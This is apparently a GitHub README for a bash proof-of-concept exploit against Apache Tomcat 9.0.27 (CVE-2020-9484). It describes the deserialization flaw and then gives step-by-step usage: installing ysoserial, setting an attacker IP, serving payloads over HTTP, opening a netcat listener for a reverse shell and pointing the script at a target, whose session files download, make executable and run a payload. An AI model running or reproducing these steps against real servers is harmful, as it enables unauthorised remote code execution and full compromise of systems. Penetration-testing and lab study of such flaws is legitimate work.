/CVE-2020-9484

Primary LanguageShellGNU General Public License v3.0GPL-3.0

Remote Code Execution Exploit in Apache Tomcat 9.0.27

Apache Tomcat 9.0.27 is vulnerable to Remote Code Execution with the CVE-ID CVE-2020-9484. Other versions may be affected as well. Tested on Kali 2020.4 and JDK 8. This bash script is a simpel proof-of-concept. For educational purpose only.

Description

The vulnerability allows a remote attacker to execute arbitrary code on the target system.

The vulnerability exists due to insecure input validation when processing serialized data in uploaded files names. A remote attacker can pass specially crafted file name to the application and execute arbitrary code on the target system.

Successful exploitation of this vulnerability may result in complete compromise of vulnerable system but requires that the server is configured to use PersistenceManager with a FileStore and the attacker knows relative file path from storage location.

Requirements

In order to use the script, yoserial is needed. To install it:

cd /opt && git clone https://github.com/frohoff/ysoserial

cd /opt/ysoserial && wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O ysoserial-master.jar

If you have yoserial already installed, make sure to rename it to "yosorial-master.jar".

Installation

To install the script, type:

cd /opt && git clone https://github.com/PenTestical/CVE-2020-9484 && cd CVE-2020-9484/ && chmod +x CVE-2020-9484.sh

Help menu

To open the help menu, type:

./CVE-2020-9484.sh --help

or

./CVE-2020-9484.sh -h

How to use it

First, open the script and place your own IP address at line 14:

remote_ip="10.10.16.180" # change this

This script creates the files "payload.sh", "downloadPayload.session", "chmodPayload.session" and "executePayload.session" in the same directory as you currently are. In order to use the exploit, you need to start a simpel listener at port 80. For example, usage with Python3 (start in same folder as you run the script):

sudo python3 -m http.server 80

Also, make sure to start a netcat listener at port 4444:

nc -nvlp 4444

Now run the script with the IP address of the target system you want to attack:

./CVE-2020-9484.sh target-ip

Troubleshooting

If it does not work, make sure to use JDK 8. To test which version you use, type:

java -version

Could not work on JDK version 12 or higher. Read more about it here.